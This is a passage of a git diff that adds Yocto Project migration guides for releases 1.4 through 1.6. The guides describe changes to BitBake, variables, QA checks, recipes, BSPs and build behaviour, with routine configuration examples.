+ :term:`ALLOW_EMPTY`, and the pre, post, install,
+ and uninstall script functions ``pkg_preinst``, ``pkg_postinst``,
+ ``pkg_prerm``, and ``pkg_postrm`` should always have a package name
+ override. For example, use ``RDEPENDS_${PN}`` for the main package
+ instead of ``RDEPENDS``. BitBake uses more strict checks when it
+ parses recipes.
+
+.. _migration-1.4-build-behavior:
+
+Build Behavior
+--------------
+
+Differences include the following:
+
+- *Shared State Code:* The shared state code has been optimized to
+ avoid running unnecessary tasks. For example, the following no longer
+ populates the target sysroot since that is not necessary:
+ ::
+
+ $ bitbake -c rootfs some-image
+
+ Instead, the system just needs to extract the
+ output package contents, re-create the packages, and construct the
+ root filesystem. This change is unlikely to cause any problems unless
+ you have missing declared dependencies.
+
+- *Scanning Directory Names:* When scanning for files in
+ :term:`SRC_URI`, the build system now uses
+ :term:`FILESOVERRIDES` instead of
+ :term:`OVERRIDES` for the directory names. In
+ general, the values previously in ``OVERRIDES`` are now in
+ ``FILESOVERRIDES`` as well. However, if you relied upon an additional
+ value you previously added to ``OVERRIDES``, you might now need to
+ add it to ``FILESOVERRIDES`` unless you are already adding it through
+ the :term:`MACHINEOVERRIDES` or
+ :term:`DISTROOVERRIDES` variables, as
+ appropriate. For more related changes, see the
+ ":ref:`ref-manual/migration-1.4:variables`" section.
+
+.. _migration-1.4-proxies-and-fetching-source:
+
+Proxies and Fetching Source
+---------------------------
+
+A new ``oe-git-proxy`` script has been added to replace previous methods
+of handling proxies and fetching source from Git. See the
+``meta-yocto/conf/site.conf.sample`` file for information on how to use
+this script.
+
+.. _migration-1.4-custom-interfaces-file-netbase-change:
+
+Custom Interfaces File (netbase change)
+---------------------------------------
+
+If you have created your own custom ``etc/network/interfaces`` file by
+creating an append file for the ``netbase`` recipe, you now need to
+create an append file for the ``init-ifupdown`` recipe instead, which
+you can find in the :term:`Source Directory` at
+``meta/recipes-core/init-ifupdown``. For information on how to use
+append files, see the
+":ref:`dev-manual/dev-manual-common-tasks:using .bbappend files in your layer`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _migration-1.4-remote-debugging:
+
+Remote Debugging
+----------------
+
+Support for remote debugging with the Eclipse IDE is now separated into
+an image feature (``eclipse-debug``) that corresponds to the
+``packagegroup-core-eclipse-debug`` package group. Previously, the
+debugging feature was included through the ``tools-debug`` image
+feature, which corresponds to the ``packagegroup-core-tools-debug``
+package group.
+
+.. _migration-1.4-variables:
+
+Variables
+---------
+
+The following variables have changed:
+
+- ``SANITY_TESTED_DISTROS``: This variable now uses a distribution
+ ID, which is composed of the host distributor ID followed by the
+ release. Previously,
+ :term:`SANITY_TESTED_DISTROS` was
+ composed of the description field. For example, "Ubuntu 12.10"
+ becomes "Ubuntu-12.10". You do not need to worry about this change if
+ you are not specifically setting this variable, or if you are
+ specifically setting it to "".
+
+- ``SRC_URI``: The ``${``\ :term:`PN`\ ``}``,
+ ``${``\ :term:`PF`\ ``}``,
+ ``${``\ :term:`P`\ ``}``, and ``FILE_DIRNAME`` directories
+ have been dropped from the default value of the
+ :term:`FILESPATH` variable, which is used as the
+ search path for finding files referred to in
+ :term:`SRC_URI`. If you have a recipe that relied upon
+ these directories, which would be unusual, then you will need to add
+ the appropriate paths within the recipe or, alternatively, rearrange
+ the files. The most common locations are still covered by ``${``\ :term:`BP`\ ``}``,
+ ``${``\ :term:`BPN`\ ``}``, and "files", which all remain in the default value of
+ :term:`FILESPATH`.
+
+.. _migration-target-package-management-with-rpm:
+
+Target Package Management with RPM
+----------------------------------
+
+If runtime package management is enabled and the RPM backend is
+selected, Smart is now installed for package download, dependency
+resolution, and upgrades instead of Zypper. For more information on how
+to use Smart, run the following command on the target:
+::
+
+ smart --help
+
+.. _migration-1.4-recipes-moved:
+
+Recipes Moved
+-------------
+
+The following recipes were moved from their previous locations because
+they are no longer used by anything in the OpenEmbedded-Core:
+
+- ``clutter-box2d``: Now resides in the ``meta-oe`` layer.
+
+- ``evolution-data-server``: Now resides in the ``meta-gnome`` layer.
+
+- ``gthumb``: Now resides in the ``meta-gnome`` layer.
+
+- ``gtkhtml2``: Now resides in the ``meta-oe`` layer.
+
+- ``gupnp``: Now resides in the ``meta-multimedia`` layer.
+
+- ``gypsy``: Now resides in the ``meta-oe`` layer.
+
+- ``libcanberra``: Now resides in the ``meta-gnome`` layer.
+
+- ``libgdata``: Now resides in the ``meta-gnome`` layer.
+
+- ``libmusicbrainz``: Now resides in the ``meta-multimedia`` layer.
+
+- ``metacity``: Now resides in the ``meta-gnome`` layer.
+
+- ``polkit``: Now resides in the ``meta-oe`` layer.
+
+- ``zeroconf``: Now resides in the ``meta-networking`` layer.
+
+.. _migration-1.4-removals-and-renames:
+
+Removals and Renames
+--------------------
+
+The following list shows what has been removed or renamed:
+
+- ``evieext``: Removed because it has been removed from ``xserver``
+ since 2008.
+
+- *Gtk+ DirectFB:* Removed support because upstream Gtk+ no longer
+ supports it as of version 2.18.
+
+- ``libxfontcache / xfontcacheproto``: Removed because they were
+ removed from the Xorg server in 2008.
+
+- ``libxp / libxprintapputil / libxprintutil / printproto``: Removed
+ because the XPrint server was removed from Xorg in 2008.
+
+- ``libxtrap / xtrapproto``: Removed because their functionality was
+ broken upstream.
+
+- *linux-yocto 3.0 kernel:* Removed with linux-yocto 3.8 kernel being
+ added. The linux-yocto 3.2 and linux-yocto 3.4 kernels remain as part
+ of the release.
+
+- ``lsbsetup``: Removed with functionality now provided by
+ ``lsbtest``.
+
+- ``matchbox-stroke``: Removed because it was never more than a
+ proof-of-concept.
+
+- ``matchbox-wm-2 / matchbox-theme-sato-2``: Removed because they are
+ not maintained. However, ``matchbox-wm`` and ``matchbox-theme-sato``
+ are still provided.
+
+- ``mesa-dri``: Renamed to ``mesa``.
+
+- ``mesa-xlib``: Removed because it was no longer useful.
+
+- ``mutter``: Removed because nothing ever uses it and the recipe is
+ very old.
+
+- ``orinoco-conf``: Removed because it has become obsolete.
+
+- ``update-modules``: Removed because it is no longer used. The
+ kernel module ``postinstall`` and ``postrm`` scripts can now do the
+ same task without the use of this script.
+
+- ``web``: Removed because it is not maintained. Superseded by
+ ``web-webkit``.
+
+- ``xf86bigfontproto``: Removed because upstream it has been disabled
+ by default since 2007. Nothing uses ``xf86bigfontproto``.
+
+- ``xf86rushproto``: Removed because its dependency in ``xserver``
+ was spurious and it was removed in 2005.
+
+- ``zypper / libzypp / sat-solver``: Removed and been functionally
+ replaced with Smart (``python-smartpm``) when RPM packaging is used
+ and package management is enabled on the target.
+
diff --git a/documentation/ref-manual/migration-1.5.rst b/documentation/ref-manual/migration-1.5.rst
new file mode 100644
index 0000000000..fc7aface9e
--- /dev/null
+++ b/documentation/ref-manual/migration-1.5.rst
@@ -0,0 +1,353 @@
+Moving to the Yocto Project 1.5 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 1.5 Release from the prior release.
+
+.. _migration-1.5-host-dependency-changes:
+
+Host Dependency Changes
+-----------------------
+
+The OpenEmbedded build system now has some additional requirements on
+the host system:
+
+- Python 2.7.3+
+
+- Tar 1.24+
+
+- Git 1.7.8+
+
+- Patched version of Make if you are using 3.82. Most distributions
+ that provide Make 3.82 use the patched version.
+
+If the Linux distribution you are using on your build host does not
+provide packages for these, you can install and use the Buildtools
+tarball, which provides an SDK-like environment containing them.
+
+For more information on this requirement, see the
+":ref:`ref-manual/ref-system-requirements:required git, tar, python and gcc versions`"
+section.
+
+.. _migration-1.5-atom-pc-bsp:
+
+``atom-pc`` Board Support Package (BSP)
+---------------------------------------
+
+The ``atom-pc`` hardware reference BSP has been replaced by a
+``genericx86`` BSP. This BSP is not necessarily guaranteed to work on
+all x86 hardware, but it will run on a wider range of systems than the
+``atom-pc`` did.
+
+.. note::
+
+ Additionally, a ``genericx86-64`` BSP has been added for 64-bit Atom
+ systems.
+
+.. _migration-1.5-bitbake:
+
+BitBake
+-------
+
+The following changes have been made that relate to BitBake:
+
+- BitBake now supports a ``_remove`` operator. The addition of this
+ operator means you will have to rename any items in recipe space
+ (functions, variables) whose names currently contain ``_remove_`` or
+ end with ``_remove`` to avoid unexpected behavior.
+
+- BitBake's global method pool has been removed. This method is not
+ particularly useful and led to clashes between recipes containing
+ functions that had the same name.
+
+- The "none" server backend has been removed. The "process" server
+ backend has been serving well as the default for a long time now.
+
+- The ``bitbake-runtask`` script has been removed.
+
+- ``${``\ :term:`P`\ ``}`` and
+ ``${``\ :term:`PF`\ ``}`` are no longer added to
+ :term:`PROVIDES` by default in ``bitbake.conf``.
+ These version-specific ``PROVIDES`` items were seldom used.
+ Attempting to use them could result in two versions being built
+ simultaneously rather than just one version due to the way BitBake
+ resolves dependencies.
+
+.. _migration-1.5-qa-warnings:
+
+QA Warnings
+-----------
+
+The following changes have been made to the package QA checks:
+
+- If you have customized :term:`ERROR_QA` or
+ :term:`WARN_QA` values in your configuration, check
+ that they contain all of the issues that you wish to be reported.
+ Previous Yocto Project versions contained a bug that meant that any
+ item not mentioned in ``ERROR_QA`` or ``WARN_QA`` would be treated as
+ a warning. Consequently, several important items were not already in
+ the default value of ``WARN_QA``. All of the possible QA checks are
+ now documented in the ":ref:`insane.bbclass <ref-classes-insane>`"
+ section.
+
+- An additional QA check has been added to check if
+ ``/usr/share/info/dir`` is being installed. Your recipe should delete
+ this file within :ref:`ref-tasks-install` if "make
+ install" is installing it.
+
+- If you are using the ``buildhistory`` class, the check for the package
+ version going backwards is now controlled using a standard QA check.
+ Thus, if you have customized your ``ERROR_QA`` or ``WARN_QA`` values
+ and still wish to have this check performed, you should add
+ "version-going-backwards" to your value for one or the other
+ variables depending on how you wish it to be handled. See the
+ documented QA checks in the
+ ":ref:`insane.bbclass <ref-classes-insane>`" section.
+
+.. _migration-1.5-directory-layout-changes:
+
+Directory Layout Changes
+------------------------
+
+The following directory changes exist:
+
+- Output SDK installer files are now named to include the image name
+ and tuning architecture through the :term:`SDK_NAME`
+ variable.
+
+- Images and related files are now installed into a directory that is
+ specific to the machine, instead of a parent directory containing
+ output files for multiple machines. The
+ :term:`DEPLOY_DIR_IMAGE` variable continues
+ to point to the directory containing images for the current
+ :term:`MACHINE` and should be used anywhere there is a
+ need to refer to this directory. The ``runqemu`` script now uses this
+ variable to find images and kernel binaries and will use BitBake to
+ determine the directory. Alternatively, you can set the
+ ``DEPLOY_DIR_IMAGE`` variable in the external environment.
+
+- When buildhistory is enabled, its output is now written under the
+ :term:`Build Directory` rather than
+ :term:`TMPDIR`. Doing so makes it easier to delete
+ ``TMPDIR`` and preserve the build history. Additionally, data for
+ produced SDKs is now split by :term:`IMAGE_NAME`.
+
+- The ``pkgdata`` directory produced as part of the packaging process
+ has been collapsed into a single machine-specific directory. This
+ directory is located under ``sysroots`` and uses a machine-specific
+ name (i.e. ``tmp/sysroots/machine/pkgdata``).
+
+.. _migration-1.5-shortened-git-srcrev-values:
+
+Shortened Git ``SRCREV`` Values
+-------------------------------
+
+BitBake will now shorten revisions from Git repositories from the normal
+40 characters down to 10 characters within :term:`SRCPV`
+for improved usability in path and file names. This change should be
+safe within contexts where these revisions are used because the chances
+of spatially close collisions is very low. Distant collisions are not a
+major issue in the way the values are used.
+
+.. _migration-1.5-image-features:
+
+``IMAGE_FEATURES``
+------------------
+
+The following changes have been made that relate to
+:term:`IMAGE_FEATURES`:
+
+- The value of ``IMAGE_FEATURES`` is now validated to ensure invalid
+ feature items are not added. Some users mistakenly add package names
+ to this variable instead of using
+ :term:`IMAGE_INSTALL` in order to have the
+ package added to the image, which does not work. This change is
+ intended to catch those kinds of situations. Valid ``IMAGE_FEATURES``
+ are drawn from ``PACKAGE_GROUP`` definitions,
+ :term:`COMPLEMENTARY_GLOB` and a new
+ "validitems" varflag on ``IMAGE_FEATURES``. The "validitems" varflag
+ change allows additional features to be added if they are not
+ provided using the previous two mechanisms.
+
+- The previously deprecated "apps-console-core" ``IMAGE_FEATURES`` item
+ is no longer supported. Add "splash" to ``IMAGE_FEATURES`` if you
+ wish to have the splash screen enabled, since this is all that
+ apps-console-core was doing.
+
+.. _migration-1.5-run:
+
+``/run``
+--------
+
+The ``/run`` directory from the Filesystem Hierarchy Standard 3.0 has
+been introduced. You can find some of the implications for this change
+`here <http://cgit.openembedded.org/openembedded-core/commit/?id=0e326280a15b0f2c4ef2ef4ec441f63f55b75873>`__.
+The change also means that recipes that install files to ``/var/run``
+must be changed. You can find a guide on how to make these changes
+`here <https://www.mail-archive.com/openembedded-devel@lists.openembedded.org/msg31649.html>`__.
+
+.. _migration-1.5-removal-of-package-manager-database-within-image-recipes:
+
+Removal of Package Manager Database Within Image Recipes
+--------------------------------------------------------
+
+The image ``core-image-minimal`` no longer adds
+``remove_packaging_data_files`` to
+:term:`ROOTFS_POSTPROCESS_COMMAND`.
+This addition is now handled automatically when "package-management" is
+not in :term:`IMAGE_FEATURES`. If you have custom
+image recipes that make this addition, you should remove the lines, as
+they are not needed and might interfere with correct operation of
+postinstall scripts.
+
+.. _migration-1.5-images-now-rebuild-only-on-changes-instead-of-every-time:
+
+Images Now Rebuild Only on Changes Instead of Every Time
+--------------------------------------------------------
+
+The :ref:`ref-tasks-rootfs` and other related image
+construction tasks are no longer marked as "nostamp". Consequently, they
+will only be re-executed when their inputs have changed. Previous
+versions of the OpenEmbedded build system always rebuilt the image when
+requested rather when necessary.
+
+.. _migration-1.5-task-recipes:
+
+Task Recipes
+------------
+
+The previously deprecated ``task.bbclass`` has now been dropped. For
+recipes that previously inherited from this class, you should rename
+them from ``task-*`` to ``packagegroup-*`` and inherit packagegroup
+instead.
+
+For more information, see the
+":ref:`packagegroup.bbclass <ref-classes-packagegroup>`" section.
+
+.. _migration-1.5-busybox:
+
+BusyBox
+-------
+
+By default, we now split BusyBox into two binaries: one that is suid
+root for those components that need it, and another for the rest of the
+components. Splitting BusyBox allows for optimization that eliminates
+the ``tinylogin`` recipe as recommended by upstream. You can disable
+this split by setting
+:term:`BUSYBOX_SPLIT_SUID` to "0".
+
+.. _migration-1.5-automated-image-testing:
+
+Automated Image Testing
+-----------------------
+
+A new automated image testing framework has been added through the
+:ref:`testimage.bbclass <ref-classes-testimage*>` class. This
+framework replaces the older ``imagetest-qemu`` framework.
+
+You can learn more about performing automated image tests in the
+":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _migration-1.5-build-history:
+
+Build History
+-------------
+
+Following are changes to Build History:
+
+- Installed package sizes: ``installed-package-sizes.txt`` for an image
+ now records the size of the files installed by each package instead
+ of the size of each compressed package archive file.
+
+- The dependency graphs (``depends*.dot``) now use the actual package
+ names instead of replacing dashes, dots and plus signs with
+ underscores.
+
+- The ``buildhistory-diff`` and ``buildhistory-collect-srcrevs``
+ utilities have improved command-line handling. Use the ``--help``
+ option for each utility for more information on the new syntax.
+
+For more information on Build History, see the
+":ref:`dev-manual/dev-manual-common-tasks:maintaining build output quality`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _migration-1.5-udev:
+
+``udev``
+--------
+
+Following are changes to ``udev``:
+
+- ``udev`` no longer brings in ``udev-extraconf`` automatically through
+ :term:`RRECOMMENDS`, since this was originally
+ intended to be optional. If you need the extra rules, then add
+ ``udev-extraconf`` to your image.
+
+- ``udev`` no longer brings in ``pciutils-ids`` or ``usbutils-ids``
+ through ``RRECOMMENDS``. These are not needed by ``udev`` itself and
+ removing them saves around 350KB.
+
+.. _migration-1.5-removed-renamed-recipes:
+
+Removed and Renamed Recipes
+---------------------------
+
+- The ``linux-yocto`` 3.2 kernel has been removed.
+
+- ``libtool-nativesdk`` has been renamed to ``nativesdk-libtool``.
+
+- ``tinylogin`` has been removed. It has been replaced by a suid
+ portion of Busybox. See the "`BusyBox <#busybox>`__"
+ section for more information.
+
+- ``external-python-tarball`` has been renamed to
+ ``buildtools-tarball``.
+
+- ``web-webkit`` has been removed. It has been functionally replaced by
+ ``midori``.
+
+- ``imake`` has been removed. It is no longer needed by any other
+ recipe.
+
+- ``transfig-native`` has been removed. It is no longer needed by any
+ other recipe.
+
+- ``anjuta-remote-run`` has been removed. Anjuta IDE integration has
+ not been officially supported for several releases.
+
+.. _migration-1.5-other-changes:
+
+Other Changes
+-------------
+
+Following is a list of short entries describing other changes:
+
+- ``run-postinsts``: Make this generic.
+
+- ``base-files``: Remove the unnecessary ``media/``\ xxx directories.
+
+- ``alsa-state``: Provide an empty ``asound.conf`` by default.
+
+- ``classes/image``: Ensure
+ :term:`BAD_RECOMMENDATIONS` supports
+ pre-renamed package names.
+
+- ``classes/rootfs_rpm``: Implement ``BAD_RECOMMENDATIONS`` for RPM.
+
+- ``systemd``: Remove ``systemd_unitdir`` if ``systemd`` is not in
+ :term:`DISTRO_FEATURES`.
+
+- ``systemd``: Remove ``init.d`` dir if ``systemd`` unit file is
+ present and ``sysvinit`` is not a distro feature.
+
+- ``libpam``: Deny all services for the ``OTHER`` entries.
+
+- ``image.bbclass``: Move ``runtime_mapping_rename`` to avoid conflict
+ with ``multilib``. See :yocto_bugs:`YOCTO #4993 </show_bug.cgi?id=4993>`
+ in Bugzilla for more information.
+
+- ``linux-dtb``: Use kernel build system to generate the ``dtb`` files.
+
+- ``kern-tools``: Switch from guilt to new ``kgit-s2q`` tool.
+
diff --git a/documentation/ref-manual/migration-1.6.rst b/documentation/ref-manual/migration-1.6.rst
new file mode 100644
index 0000000000..a6c4c8a93a
--- /dev/null
+++ b/documentation/ref-manual/migration-1.6.rst
@@ -0,0 +1,416 @@
+Moving to the Yocto Project 1.6 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 1.6 Release from the prior release.
+
+.. _migration-1.6-archiver-class:
+
+``archiver`` Class
+------------------
+
+The :ref:`archiver <ref-classes-archiver>` class has been rewritten
+and its configuration has been simplified. For more details on the
+source archiver, see the
+":ref:`dev-manual/dev-manual-common-tasks:maintaining open source license compliance during your product's lifecycle`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _migration-1.6-packaging-changes:
+
+Packaging Changes
+-----------------
+
+The following packaging changes have been made:
+
+- The ``binutils`` recipe no longer produces a ``binutils-symlinks``
+ package. ``update-alternatives`` is now used to handle the preferred
+ ``binutils`` variant on the target instead.
+
+- The tc (traffic control) utilities have been split out of the main
+ ``iproute2`` package and put into the ``iproute2-tc`` package.
+
+- The ``gtk-engines`` schemas have been moved to a dedicated
+ ``gtk-engines-schemas`` package.
+
+- The ``armv7a`` with thumb package architecture suffix has changed.
+ The suffix for these packages with the thumb optimization enabled is
+ "t2" as it should be. Use of this suffix was not the case in the 1.5
+ release. Architecture names will change within package feeds as a
+ result.
+
+.. _migration-1.6-bitbake:
+
+BitBake
+-------
+
+The following changes have been made to :term:`BitBake`.
+
+.. _migration-1.6-matching-branch-requirement-for-git-fetching:
+
+Matching Branch Requirement for Git Fetching
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+When fetching source from a Git repository using
+:term:`SRC_URI`, BitBake will now validate the
+:term:`SRCREV` value against the branch. You can specify
+the branch using the following form:
+::
+
+ SRC_URI = "git://server.name/repository;branch=branchname"
+
+If you do not specify a branch, BitBake looks in the default "master" branch.
+
+Alternatively, if you need to bypass this check (e.g. if you are
+fetching a revision corresponding to a tag that is not on any branch),
+you can add ";nobranch=1" to the end of the URL within ``SRC_URI``.
+
+.. _migration-1.6-bitbake-deps:
+
+Python Definition substitutions
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+BitBake had some previously deprecated Python definitions within its
+``bb`` module removed. You should use their sub-module counterparts
+instead:
+
+- ``bb.MalformedUrl``: Use ``bb.fetch.MalformedUrl``.
+
+- ``bb.encodeurl``: Use ``bb.fetch.encodeurl``.
+
+- ``bb.decodeurl``: Use ``bb.fetch.decodeurl``
+
+- ``bb.mkdirhier``: Use ``bb.utils.mkdirhier``.
+
+- ``bb.movefile``: Use ``bb.utils.movefile``.
+
+- ``bb.copyfile``: Use ``bb.utils.copyfile``.
+
+- ``bb.which``: Use ``bb.utils.which``.
+
+- ``bb.vercmp_string``: Use ``bb.utils.vercmp_string``.
+
+- ``bb.vercmp``: Use ``bb.utils.vercmp``.
+
+.. _migration-1.6-bitbake-fetcher:
+
+SVK Fetcher
+~~~~~~~~~~~
+
+The SVK fetcher has been removed from BitBake.
+
+.. _migration-1.6-bitbake-console-output:
+
+Console Output Error Redirection
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The BitBake console UI will now output errors to ``stderr`` instead of
+``stdout``. Consequently, if you are piping or redirecting the output of
+``bitbake`` to somewhere else, and you wish to retain the errors, you
+will need to add ``2>&1`` (or something similar) to the end of your
+``bitbake`` command line.
+
+.. _migration-1.6-task-taskname-overrides:
+
+``task-``\ taskname Overrides
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+``task-``\ taskname overrides have been adjusted so that tasks whose
+names contain underscores have the underscores replaced by hyphens for
+the override so that they now function properly. For example, the task
+override for :ref:`ref-tasks-populate_sdk` is
+``task-populate-sdk``.
+
+.. _migration-1.6-variable-changes:
+
+Changes to Variables
+--------------------
+
+The following variables have changed. For information on the
+OpenEmbedded build system variables, see the ":doc:`ref-variables`" Chapter.
+
+.. _migration-1.6-variable-changes-TMPDIR:
+
+``TMPDIR``
+~~~~~~~~~~
+
+:term:`TMPDIR` can no longer be on an NFS mount. NFS does
+not offer full POSIX locking and inode consistency and can cause
+unexpected issues if used to store ``TMPDIR``.
+
+The check for this occurs on startup. If ``TMPDIR`` is detected on an
+NFS mount, an error occurs.
+
+.. _migration-1.6-variable-changes-PRINC:
+
+``PRINC``
+~~~~~~~~~
+
+The ``PRINC`` variable has been deprecated and triggers a warning if
+detected during a build. For :term:`PR` increments on changes,
+use the PR service instead. You can find out more about this service in
+the ":ref:`dev-manual/dev-manual-common-tasks:working with a pr service`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _migration-1.6-variable-changes-IMAGE_TYPES:
+
+``IMAGE_TYPES``
+~~~~~~~~~~~~~~~
+
+The "sum.jffs2" option for :term:`IMAGE_TYPES` has
+been replaced by the "jffs2.sum" option, which fits the processing
+order.
+
+.. _migration-1.6-variable-changes-COPY_LIC_MANIFEST:
+
+``COPY_LIC_MANIFEST``
+~~~~~~~~~~~~~~~~~~~~~
+
+The :term:`COPY_LIC_MANIFEST` variable must now
+be set to "1" rather than any value in order to enable it.
+
+.. _migration-1.6-variable-changes-COPY_LIC_DIRS:
+
+``COPY_LIC_DIRS``
+~~~~~~~~~~~~~~~~~
+
+The :term:`COPY_LIC_DIRS` variable must now be set
+to "1" rather than any value in order to enable it.
+
+.. _migration-1.6-variable-changes-PACKAGE_GROUP:
+
+``PACKAGE_GROUP``
+~~~~~~~~~~~~~~~~~
+
+The ``PACKAGE_GROUP`` variable has been renamed to
+:term:`FEATURE_PACKAGES` to more accurately
+reflect its purpose. You can still use ``PACKAGE_GROUP`` but the
+OpenEmbedded build system produces a warning message when it encounters
+the variable.
+
+.. _migration-1.6-variable-changes-variable-entry-behavior:
+
+Preprocess and Post Process Command Variable Behavior
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The following variables now expect a semicolon separated list of
+functions to call and not arbitrary shell commands:
+
+ - :term:`ROOTFS_PREPROCESS_COMMAND`
+ - :term:`ROOTFS_POSTPROCESS_COMMAND`
+ - :term:`SDK_POSTPROCESS_COMMAND`
+ - :term:`POPULATE_SDK_POST_TARGET_COMMAND`
+ - :term:`POPULATE_SDK_POST_HOST_COMMAND`
+ - :term:`IMAGE_POSTPROCESS_COMMAND`
+ - :term:`IMAGE_PREPROCESS_COMMAND`
+ - :term:`ROOTFS_POSTUNINSTALL_COMMAND`
+ - :term:`ROOTFS_POSTINSTALL_COMMAND`
+
+For
+migration purposes, you can simply wrap shell commands in a shell
+function and then call the function. Here is an example: ::
+
+ my_postprocess_function() {
+ echo "hello" > ${IMAGE_ROOTFS}/hello.txt
+ }
+ ROOTFS_POSTPROCESS_COMMAND += "my_postprocess_function; "
+
+.. _migration-1.6-package-test-ptest:
+
+Package Test (ptest)
+--------------------
+
+Package Tests (ptest) are built but not installed by default. For
+information on using Package Tests, see the
+":ref:`dev-manual/dev-manual-common-tasks:testing packages with ptest`"
+section in the Yocto Project Development Tasks Manual. For information on the
+``ptest`` class, see the ":ref:`ptest.bbclass <ref-classes-ptest>`"
+section.
+
+.. _migration-1.6-build-changes:
+
+Build Changes
+-------------
+
+Separate build and source directories have been enabled by default for
+selected recipes where it is known to work (a whitelist) and for all
+recipes that inherit the :ref:`cmake <ref-classes-cmake>` class. In
+future releases the :ref:`autotools <ref-classes-autotools>` class
+will enable a separate build directory by default as well. Recipes
+building Autotools-based software that fails to build with a separate
+build directory should be changed to inherit from the
+:ref:`autotools-brokensep <ref-classes-autotools>` class instead of
+the ``autotools`` or ``autotools_stage``\ classes.
+
+.. _migration-1.6-building-qemu-native:
+
+``qemu-native``
+---------------
+
+``qemu-native`` now builds without SDL-based graphical output support by
+default. The following additional lines are needed in your
+``local.conf`` to enable it:
+::
+
+ PACKAGECONFIG_pn-qemu-native = "sdl"
+ ASSUME_PROVIDED += "libsdl-native"
+
+.. note::
+
+ The default ``local.conf`` contains these statements. Consequently, if you
+ are building a headless system and using a default ``local.conf``
+ file, you will need comment these two lines out.
+
+.. _migration-1.6-core-image-basic:
+
+``core-image-basic``
+--------------------
+
+``core-image-basic`` has been renamed to ``core-image-full-cmdline``.
+
+In addition to ``core-image-basic`` being renamed,
+``packagegroup-core-basic`` has been renamed to
+``packagegroup-core-full-cmdline`` to match.
+
+.. _migration-1.6-licensing:
+
+Licensing
+---------
+
+The top-level ``LICENSE`` file has been changed to better describe the
+license of the various components of :term:`OpenEmbedded-Core (OE-Core)`. However,
+the licensing itself remains unchanged.
+
+Normally, this change would not cause any side-effects. However, some
+recipes point to this file within
+:term:`LIC_FILES_CHKSUM` (as
+``${COREBASE}/LICENSE``) and thus the accompanying checksum must be
+changed from 3f40d7994397109285ec7b81fdeb3b58 to
+4d92cd373abda3937c2bc47fbc49d690. A better alternative is to have
+``LIC_FILES_CHKSUM`` point to a file describing the license that is
+distributed with the source that the recipe is building, if possible,
+rather than pointing to ``${COREBASE}/LICENSE``.
+
+.. _migration-1.6-cflags-options:
+
+``CFLAGS`` Options
+------------------
+
+The "-fpermissive" option has been removed from the default
+:term:`CFLAGS` value. You need to take action on
+individual recipes that fail when building with this option. You need to
+either patch the recipes to fix the issues reported by the compiler, or
+you need to add "-fpermissive" to ``CFLAGS`` in the recipes.
+
+.. _migration-1.6-custom-images:
+
+Custom Image Output Types
+-------------------------
+
+Custom image output types, as selected using
+:term:`IMAGE_FSTYPES`, must declare their
+dependencies on other image types (if any) using a new
+:term:`IMAGE_TYPEDEP` variable.
+
+.. _migration-1.6-do-package-write-task:
+
+Tasks
+-----
+
+The ``do_package_write`` task has been removed. The task is no longer
+needed.
+
+.. _migration-1.6-update-alternatives-provider:
+
+``update-alternative`` Provider
+-------------------------------
+
+The default ``update-alternatives`` provider has been changed from
+``opkg`` to ``opkg-utils``. This change resolves some troublesome
+circular dependencies. The runtime package has also been renamed from
+``update-alternatives-cworth`` to ``update-alternatives-opkg``.
+
+.. _migration-1.6-virtclass-overrides:
+
+``virtclass`` Overrides
+-----------------------
+
+The ``virtclass`` overrides are now deprecated. Use the equivalent class
+overrides instead (e.g. ``virtclass-native`` becomes ``class-native``.)
+
+.. _migration-1.6-removed-renamed-recipes:
+
+Removed and Renamed Recipes
+---------------------------
+
+The following recipes have been removed:
+
+- ``packagegroup-toolset-native`` - This recipe is largely unused.
+
+- ``linux-yocto-3.8`` - Support for the Linux yocto 3.8 kernel has been
+ dropped. Support for the 3.10 and 3.14 kernels have been added with
+ the ``linux-yocto-3.10`` and ``linux-yocto-3.14`` recipes.
+
+- ``ocf-linux`` - This recipe has been functionally replaced using
+ ``cryptodev-linux``.
+
+- ``genext2fs`` - ``genext2fs`` is no longer used by the build system
+ and is unmaintained upstream.
+
+- ``js`` - This provided an ancient version of Mozilla's javascript
+ engine that is no longer needed.
+
+- ``zaurusd`` - The recipe has been moved to the ``meta-handheld``
+ layer.
+
+- ``eglibc 2.17`` - Replaced by the ``eglibc 2.19`` recipe.
+
+- ``gcc 4.7.2`` - Replaced by the now stable ``gcc 4.8.2``.
+
+- ``external-sourcery-toolchain`` - this recipe is now maintained in
+ the ``meta-sourcery`` layer.
+
+- ``linux-libc-headers-yocto 3.4+git`` - Now using version 3.10 of the
+ ``linux-libc-headers`` by default.
+
+- ``meta-toolchain-gmae`` - This recipe is obsolete.
+
+- ``packagegroup-core-sdk-gmae`` - This recipe is obsolete.
+
+- ``packagegroup-core-standalone-gmae-sdk-target`` - This recipe is
+ obsolete.
+
+.. _migration-1.6-removed-classes:
+
+Removed Classes
+---------------
+
+The following classes have become obsolete and have been removed:
+
+- ``module_strip``
+
+- ``pkg_metainfo``
+
+- ``pkg_distribute``
+
+- ``image-empty``
+
+.. _migration-1.6-reference-bsps:
+
+Reference Board Support Packages (BSPs)
+---------------------------------------
+
+The following reference BSPs changes occurred:
+
+- The BeagleBoard (``beagleboard``) ARM reference hardware has been
+ replaced by the BeagleBone (``beaglebone``) hardware.
+
+- The RouterStation Pro (``routerstationpro``) MIPS reference hardware
+ has been replaced by the EdgeRouter Lite (``edgerouter``) hardware.
+
+The previous reference BSPs for the ``beagleboard`` and
+``routerstationpro`` machines are still available in a new
+``meta-yocto-bsp-old`` layer in the
+:yocto_git:`Source Repositories <>` at
+:yocto_git:`/cgit/cgit.cgi/meta-yocto-bsp-old/`.
+
+
diff --git a/documentation/ref-manual/migration-1.7.rst b/documentation/ref-manual/migration-1.7.rst
new file mode 100644
